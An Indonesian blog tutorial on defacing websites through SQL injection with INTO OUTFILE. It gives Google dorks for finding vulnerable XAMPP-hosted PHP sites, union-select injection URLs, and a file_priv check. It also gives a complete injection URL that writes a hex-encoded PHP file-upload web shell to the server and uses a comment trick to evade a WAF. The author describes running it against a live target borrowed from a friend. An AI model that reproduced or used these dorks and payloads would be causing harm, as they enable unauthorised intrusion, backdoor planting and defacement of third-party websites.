Deface POC SQL Injection Into Outfile


Hallo, 
Oke pada artikel kali ini Saya ingin memberikan Tutorial Deface lagi, Yaitu Deface POC SQL Injection Into Outfile.

Tutorial ini sebenernya sudah cukup lama, Berhubung Blog ini baru dibuat akhir-akhir ini dan juga baru nemu targetnya, Jadi baru sempet buat sekarang. 😅

Oke langsung aja ke tutorial nya.

Mencari Target

Tahap pertama adalah mencari target untuk di Eksekusi, Saya menyarankan Kalian untuk menggunakan Dork dibawah ini:
inurl:/.php?id= intext:"C:/xampp"
intext:"error on line" inurl:/.php?id=
Note : Kembangin lagi dorknya, Biar dapat target yang Perawan.


Simpan PATH yang muncul disitu untuk nanti nya Into Outfile.

SQL Injection Into Outfile

Sebenernya Tutorialnya sama aja dengan SQL Injection manual (order by, union select) sampe nemu Magic numbernya.

Cuman bedanya yang ini langsung Upload shell, tanpa perlu nyari username/password admin > Login > Upload shell.


Yapss, Magic numbernya adalah 4 tidak ada yang lain. Tinggal cek saja usernya menggunakan query user().


Hmmm, usernya bukan root@localhost, Emang bisa? Coba aja dulu, hehe.

Disini Saya mencoba memasukkan query file_priv di Magic number dan from mysql.user di akhir URL nya, Untuk lebih lengkapnya seperti ini:
http://localhost/parameter.php?id=1337'+and+0+union+select+1,2,3,file_priv,5,6,7,8+from+mysql.user--+-

Walaupun usernya bukan root@localhost, Tapi ada jawaban "Y" pada saat Saya memasukkan query tersebut.

Kemungkinan bisa untuk di Into Outfile, Lets go Kita coba eksekusi.


Dan untuk Query SQL Injection Into Outfile nya adalah sebagai berikut:
http://localhost/parameter.php?id=1337'+and+0+union+select+1,2,3,0x3c3f706870206563686f202755706c6f616465723c62723e273b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2222206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d6461746122206e616d653d2275706c6f61646572222069643d2275706c6f61646572223e273b6563686f20273c696e70757420747970653d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696e707574206e616d653d225f75706c2220747970653d227375626d6974222069643d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273b69662820245f504f53545b275f75706c275d203d3d202255706c6f6164222029207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2929207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d656c7365207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d7d3f3e,5,6,7,8 /*!50000into*/+outfile+'C:/xampp/afsn_acfs/afsn/eviltwin.php'--+-
Note : Saya menggunakan Comment untuk bypass nya, soalnya kalo enggak pake comment kena WAF.

Sekarang tinggal cek saja File nya masuk atau enggak.


Ternyata file nya masuk walaupun usernya bukan root@localhost 😅.

Btw Thanks buat Faza Pandorez karena udah minjemin Live targetnya, hehe.

Akhir Kata

Oke mungkin cukup sampai disini aja artikel tentang "Deface POC SQL Injection Into Outfile".
Mohon maaf bila ada kesalahan kata dan sebagainya, Mohon dimaklumi.

Semoga bermanfaat dan Sampai numpa di artikel selanjutnya!